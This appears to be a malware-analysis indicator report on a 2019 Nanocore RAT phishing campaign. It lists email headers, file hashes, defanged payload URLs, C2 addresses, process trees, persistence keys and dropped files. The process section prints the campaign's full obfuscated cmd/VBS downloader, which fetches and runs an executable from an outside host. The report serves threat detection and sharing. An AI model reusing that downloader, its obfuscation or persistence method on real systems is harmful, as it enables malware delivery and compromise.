#nanocore_050819

#IOC #OptiData #VR #nanocore #RAT #macro

https://pastebin.com/yiaWaNvQ

previous_contact:
25/04/19	https://pastebin.com/cSy68j5q
07/01/19	https://pastebin.com/e5f24Y8F

FAQ:		https://krebsonsecurity.com/2018/02/bot-roundup-avalanche-kronos-nanocore/

attack_vector
--------------
email attach .DOC > macro > GET JS > GET exe

email_headers
--------------
Received: from lrwdd2.directrouter.com (lrwdd2.directrouter.com [206.123.119.186])
Date: Mon, 05 Aug 2019 04:22:00 -0500
From: cellardoor@palmerwines.com.au
To: user00@victim77.com
Subject: Fwd: Purchasing Oder
X-Sender: cellardoor@palmerwines.com.au
User-Agent: Roundcube Webmail/1.3.8

files
--------------
SHA-256		ff1fe92b711075243cbb176d5e98dd07478a809db12c2189bb12a3874f10339c
File name	PO URGENT.doc
File size	508 KB (520192 bytes)

SHA-256		1148d46151ef33f158bab7fb99a6cd84f3b27a627994bd5f2a55b5fea029e55f
File name	azz.js
File size	80.05 KB (81970 bytes)

SHA-256		b3e668b755ceb4754b118ba8ec718755f4dbd37ef572a268e1d5b2a8d6d07ba7
File name	hercilio.exe
File size	203 KB (207872 bytes)

activity
**************
PL_SCR
h11ps\kcexports{.} me/azz.js
h11ps\kcexports{.} me/hercilio.exe

C2
67.207.93.17
185.244.31.111	1606

netwrk
--------------
[ssl]
167.71.13.65	kcexports.me	Client Hello

comp
--------------
WINWORD.EXE	2888	TCP	localhost	49217	162.255.119.195	443	SYN_SENT
wscript.exe	1124	TCP	localhost	49219	162.255.119.195	443	SYN_SENT
wscript.exe	2664	TCP	localhost	49222	67.207.93.17	7744	SYN_SENT
EJV.EXE		1368	TCP	localhost	49226	185.244.31.111	1606	SYN_SENT

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
"C:\Windows\System32\WScript.exe" "C:\tmp\mczekg5e.js"
"C:\Windows\System32\wscript.exe" //B "C:\Users\operator\AppData\Roaming\KQWPXSGZoR.js"
"C:\Windows\System32\cmd.exe" /c cd %temp% &@echo Y3x = " h11ps\kcexports{.} me/hercilio.exe">>B3g.vbs &@echo W8r = M8m("jo{Sj}j")>>B3g.vbs &@echo Set S5z = CreateObject(M8m("rx}rqWS}rqmyyu"))>>B3g.vbs &@echo S5z.Open M8m("ljy"), Y3x, False>>B3g.vbs &@echo S5z.send ("")>>B3g.vbs &@echo Set J8g = CreateObject(M8m("fitigSxywjfr"))>>B3g.vbs &@echo J8g.Open>>B3g.vbs &@echo J8g.Type = 1 >>B3g.vbs &@echo J8g.Write S5z.ResponseBody>>B3g.vbs & @echo J8g.Position = 0 >>B3g.vbs &@echo J8g.SaveToFile W8r, 2 >>B3g.vbs &@echo J8g.Close>>B3g.vbs  &@echo function M8m(H7m) >> B3g.vbs &@echo For B6c = 1 To Len(H7m) >>B3g.vbs &@echo E7e = Mid(H7m, B6c, 1) >>B3g.vbs &@echo E7e = Chr(Asc(E7e)- 37) >>B3g.vbs &@echo O9c = O9c + E7e >> B3g.vbs &@echo Next >>B3g.vbs &@echo M8m = O9c >>B3g.vbs &@echo End Function >>B3g.vbs& B3g.vbs &dEl B3g.vbs & timeout 13 & EJV.EXE
"C:\Windows\System32\WScript.exe" "C:\tmp\B3g.vbs"
C:\Windows\SysWOW64\timeout  13
C:\tmp\EJV.EXE

persist
--------------
@HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run				05.08.2019 18:05

	ARP Service			c:\users\operator\appdata\roaming\9907dcbd-0284-49da-87e9-3f380347acb7\arp service\arpsv.exe	22.02.2015 3:49

	KQWPXSGZoR			c:\users\operator\appdata\roaming\kqwpxsgzor.js	05.08.2019 18:04
wscript.exe //B "C:\Users\operator\AppData\Roaming\KQWPXSGZoR.js"

@C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup				05.08.2019 18:04

	KQWPXSGZoR.js			c:\users\operator\appdata\roaming\microsoft\windows\start menu\programs\startup\kqwpxsgzor.js	05.08.2019 18:04

drop
--------------
%temp%\mczekg5e.js	[azz[1].js]
%temp%\B3g.vbs
%temp%\EJV.EXE		[hercilio[1].exe]
C:\Users\operator\AppData\Roaming\KQWPXSGZoR.js
C:\Users\operator\AppData\Roaming\9907DCBD-0284-49DA-87E9-3F380347ACB7\ARP Service\arpsv.exe
C:\Users\operator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KQWPXSGZoR.js

# # #
https://www.virustotal.com/gui/file/ff1fe92b711075243cbb176d5e98dd07478a809db12c2189bb12a3874f10339c/details
https://www.virustotal.com/gui/file/1148d46151ef33f158bab7fb99a6cd84f3b27a627994bd5f2a55b5fea029e55f/details
https://www.virustotal.com/gui/file/b3e668b755ceb4754b118ba8ec718755f4dbd37ef572a268e1d5b2a8d6d07ba7/details
https://analyze.intezer.com/#/analyses/919c9d77-4d63-4f96-a35b-0a5435c1297d

VR

@